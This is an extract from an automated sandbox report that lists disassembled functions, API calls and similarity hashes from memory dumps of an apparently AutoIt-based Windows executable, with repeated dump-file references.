                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2875609808-0
                                                                                                                        • Opcode ID: e49b36f24374f319d3229124af0d6e000ccd0220926fae48b5f451cc9dacc874
                                                                                                                        • Instruction ID: 827f1e4846da4f2de6a321d3261ca032b212c4e86b297d032f78471ad1447f93
                                                                                                                        • Opcode Fuzzy Hash: e49b36f24374f319d3229124af0d6e000ccd0220926fae48b5f451cc9dacc874
                                                                                                                        • Instruction Fuzzy Hash: 0F117931D45528EBCF00EFE6DA88AEEBB78FF09715F005056E985B2240CB309654CBA9
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3016257755-0
                                                                                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction ID: 34818ded4a1a2b28f19defdf84fab26185b510602715188a5c98bf8c67793051
                                                                                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                        • Instruction Fuzzy Hash: BC01403600064EBBCF165F84ED41EEE3F62FF18350B588519FE585A035D236D9B1ABA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DB869D: __getptd_noexit.LIBCMT ref: 00DB869E
                                                                                                                        • __lock.LIBCMT ref: 00DB811F
                                                                                                                        • InterlockedDecrement.KERNEL32(?), ref: 00DB813C
                                                                                                                        • _free.LIBCMT ref: 00DB814F
                                                                                                                        • InterlockedIncrement.KERNEL32(013B6BD8), ref: 00DB8167
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2704283638-0
                                                                                                                        • Opcode ID: 0a358d42c426181e77101c96bddac7e68220b9b2b37b65fa8961e7e622cb2dd5
                                                                                                                        • Instruction ID: 11ff25ef945ea8bdf5172a08fab1cee34b928f65a1ff698f1c34719de5816410
                                                                                                                        • Opcode Fuzzy Hash: 0a358d42c426181e77101c96bddac7e68220b9b2b37b65fa8961e7e622cb2dd5
                                                                                                                        • Instruction Fuzzy Hash: 9301A135902721DBDB21AF6998067DD7368FF05761F080119F41677290DF249802EBF2
                                                                                                                        APIs
                                                                                                                        • __lock.LIBCMT ref: 00DB8768
                                                                                                                          • Part of subcall function 00DB8984: __mtinitlocknum.LIBCMT ref: 00DB8996
                                                                                                                          • Part of subcall function 00DB8984: RtlEnterCriticalSection.NTDLL(00DB0127), ref: 00DB89AF
                                                                                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00DB8775
                                                                                                                        • __lock.LIBCMT ref: 00DB8789
                                                                                                                        • ___addlocaleref.LIBCMT ref: 00DB87A7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1687444384-0
                                                                                                                        • Opcode ID: 70d9beba7b03d05792a86b9a031d6ce507938948e378e11b104ff13072d224f2
                                                                                                                        • Instruction ID: fe94960572413dc3509f5f31b333f39c6b80677e89f21a2694d440b3b616c7f6
                                                                                                                        • Opcode Fuzzy Hash: 70d9beba7b03d05792a86b9a031d6ce507938948e378e11b104ff13072d224f2
                                                                                                                        • Instruction Fuzzy Hash: 6F015B71440B00EFD760AF65D806799B7E4EF40725F20890EE49A972A0CF70A644DF22
                                                                                                                        APIs
                                                                                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00DD9C7F
                                                                                                                          • Part of subcall function 00DDAD14: _memset.LIBCMT ref: 00DDAD49
                                                                                                                        • _memmove.LIBCMT ref: 00DD9CA2
                                                                                                                        • _memset.LIBCMT ref: 00DD9CAF
                                                                                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00DD9CBF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 48991266-0
                                                                                                                        • Opcode ID: 07fe20a60e5df686cd7d9bef16e2525123c5c4983e1dbda3a9dda1d8e766ed4e
                                                                                                                        • Instruction ID: 8528fe799bb566c7e475d7c1fc8f0daf733e3f90c5ba428aaa22f403459af4c8
                                                                                                                        • Opcode Fuzzy Hash: 07fe20a60e5df686cd7d9bef16e2525123c5c4983e1dbda3a9dda1d8e766ed4e
                                                                                                                        • Instruction Fuzzy Hash: 5EF03A7A200000AFCF016F55EC85A8ABB29EF45320B08C062FE09AF227C731E815DBB5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAB58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00DAB5EB
                                                                                                                          • Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB5FA
                                                                                                                          • Part of subcall function 00DAB58B: BeginPath.GDI32(?), ref: 00DAB611
                                                                                                                          • Part of subcall function 00DAB58B: SelectObject.GDI32(?,00000000), ref: 00DAB63B
                                                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00DFE860
                                                                                                                        • LineTo.GDI32(00000000,?,?), ref: 00DFE86D
                                                                                                                        • EndPath.GDI32(00000000), ref: 00DFE87D
                                                                                                                        • StrokePath.GDI32(00000000), ref: 00DFE88B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1539411459-0
                                                                                                                        • Opcode ID: 84bb3f9c3e19f150b58f3face767e88fee5aab41710f57c2d8ab53d6e00d4a7a
                                                                                                                        • Instruction ID: 6cafa517c2799560689028fe0e02a768e468563480cf057a8fa923ae1158a146
                                                                                                                        • Opcode Fuzzy Hash: 84bb3f9c3e19f150b58f3face767e88fee5aab41710f57c2d8ab53d6e00d4a7a
                                                                                                                        • Instruction Fuzzy Hash: 88F09A31005259BADB162F51AC09FCA3F9AAF0A311F04C141FB01340E1C379461A8BA5
                                                                                                                        APIs
                                                                                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00DCD640
                                                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00DCD653
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00DCD65A
                                                                                                                        • AttachThreadInput.USER32(00000000), ref: 00DCD661
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2710830443-0
                                                                                                                        • Opcode ID: 91457ebbd041a039cc276b7947268ec109aeed6bb66ed4c2f4bbfc1ebc28e8cd
                                                                                                                        • Instruction ID: 129eb5fe212be2ffee501c4325a8c6087152a44240207664324f1a260f73e281
                                                                                                                        • Opcode Fuzzy Hash: 91457ebbd041a039cc276b7947268ec109aeed6bb66ed4c2f4bbfc1ebc28e8cd
                                                                                                                        • Instruction Fuzzy Hash: 44E03971245228BADB215FA29C0DFDB7F5CEF117A1F008024B90CA6060CB75D584CBB0
                                                                                                                        APIs
                                                                                                                        • GetSysColor.USER32(00000008), ref: 00DAB0C5
                                                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00DAB0CF
                                                                                                                        • SetBkMode.GDI32(?,00000001), ref: 00DAB0E4
                                                                                                                        • GetStockObject.GDI32(00000005), ref: 00DAB0EC
                                                                                                                        • GetWindowDC.USER32(?,00000000), ref: 00E0ECFA
                                                                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 00E0ED07
                                                                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 00E0ED20
                                                                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 00E0ED39
                                                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00E0ED59
                                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00E0ED64
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1946975507-0
                                                                                                                        • Opcode ID: 85eae39dc884a715bbb49e402b8ab0333cca63bdbba57fd6ba7e59465707c37f
                                                                                                                        • Instruction ID: 71972863418db4b4c9971a077783a98cae5cdb2ed44d6eebda5824271000cbce
                                                                                                                        • Opcode Fuzzy Hash: 85eae39dc884a715bbb49e402b8ab0333cca63bdbba57fd6ba7e59465707c37f
                                                                                                                        • Instruction Fuzzy Hash: 9AE06D31204240BEEB211F75AC497C87F21AB06339F14C226F769680E2C3724984CB11
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: a4f74de5376e301687a60582c30806fe26937638c499316fb211a061702b3bff
                                                                                                                        • Instruction ID: bd561523eba9d9310f5873cffdbbc3210dffc9ee2ef97280c671660075c65ef8
                                                                                                                        • Opcode Fuzzy Hash: a4f74de5376e301687a60582c30806fe26937638c499316fb211a061702b3bff
                                                                                                                        • Instruction Fuzzy Hash: FEE046B1508204EFDB005F72CC48AAD7BE9EB4C360F21C805FC4AAB250DBB99884CB20
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2889604237-0
                                                                                                                        • Opcode ID: c3faeb8359495f3847d5f97528e33350fc2f0c8fbe775d7a876d0f25333bf145
                                                                                                                        • Instruction ID: eeaa0df8b2ae85ca4739c086e086d5e543eff3102349be43d6004276acc0e889
                                                                                                                        • Opcode Fuzzy Hash: c3faeb8359495f3847d5f97528e33350fc2f0c8fbe775d7a876d0f25333bf145
                                                                                                                        • Instruction Fuzzy Hash: B8E046B1908204EFDB005F72CC486AD7BE9EB4C360F11C405F94AAB210DBB89984CB20
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: >$DEFINE
                                                                                                                        • API String ID: 4104443479-1664449232
                                                                                                                        • Opcode ID: 724ede99e23c3697d8b6d82e12e9000d72e1f9b0bf2626f95c4f938ed0ed12bf
                                                                                                                        • Instruction ID: 88652ce0d8a6bff2348f5392fce6a6a2c33a8e17067a98f6c613f59985818a7f
                                                                                                                        • Opcode Fuzzy Hash: 724ede99e23c3697d8b6d82e12e9000d72e1f9b0bf2626f95c4f938ed0ed12bf
                                                                                                                        • Instruction Fuzzy Hash: 93123975A0020ADFCF24CF98C8906EDB7B1FF48314F15915AE959AB291D734ED91CBA0
                                                                                                                        APIs
                                                                                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 00DCECA0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ContainedObject
                                                                                                                        • String ID: AutoIt3GUI$Container
                                                                                                                        • API String ID: 3565006973-3941886329
                                                                                                                        • Opcode ID: 963520aeff5002e6e10b10d6e359da3c44c56a548e573a3670bdef96f702a829
                                                                                                                        • Instruction ID: 3dc83d0abd6e29b6a88a0be697443c8d6f3b11960b4944a422fb00ab572199da
                                                                                                                        • Opcode Fuzzy Hash: 963520aeff5002e6e10b10d6e359da3c44c56a548e573a3670bdef96f702a829
                                                                                                                        • Instruction Fuzzy Hash: C69107B4600702DFDB14DF68C885F6ABBA5FF49710B14856DF94ADB291EBB0E841CB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D93BCF: _wcscpy.LIBCMT ref: 00D93BF2
                                                                                                                          • Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
                                                                                                                          • Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00DDE785
                                                                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00DDE84E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                                                        • String ID: LPT
                                                                                                                        • API String ID: 3222508074-1350329615
                                                                                                                        • Opcode ID: 46a7f1d47a36c30a251475fc027f42817a53da4a3b7cd203411859cb0ead2ebd
                                                                                                                        • Instruction ID: de4e3f821077fabf2b6fae92ab14e6c27a663ac345aeaf1cc17080ad5e71d9e6
                                                                                                                        • Opcode Fuzzy Hash: 46a7f1d47a36c30a251475fc027f42817a53da4a3b7cd203411859cb0ead2ebd
                                                                                                                        • Instruction Fuzzy Hash: CD616C75A00215AFCB14EB98C891EAEB7B9EF49310F04406AF546AF390DB70EE44DB70
                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00D91B83
                                                                                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00D91B9C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: GlobalMemorySleepStatus
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 2783356886-2766056989
                                                                                                                        • Opcode ID: 3c653687f8a7fb69d93dd87853be03f349886f254b48cbb1a67774438ac83f7b
                                                                                                                        • Instruction ID: 5fca5570b84f432604cdc7f2f692385879bf9ffb09f0c1104758e8bed808abf0
                                                                                                                        • Opcode Fuzzy Hash: 3c653687f8a7fb69d93dd87853be03f349886f254b48cbb1a67774438ac83f7b
                                                                                                                        • Instruction Fuzzy Hash: FE514771808744ABE720AF15D885BABBBE8FB9A354F81484DF1C8410A1EB71956DC763
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D9417D: __fread_nolock.LIBCMT ref: 00D9419B
                                                                                                                        • _wcscmp.LIBCMT ref: 00DDCF49
                                                                                                                        • _wcscmp.LIBCMT ref: 00DDCF5C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
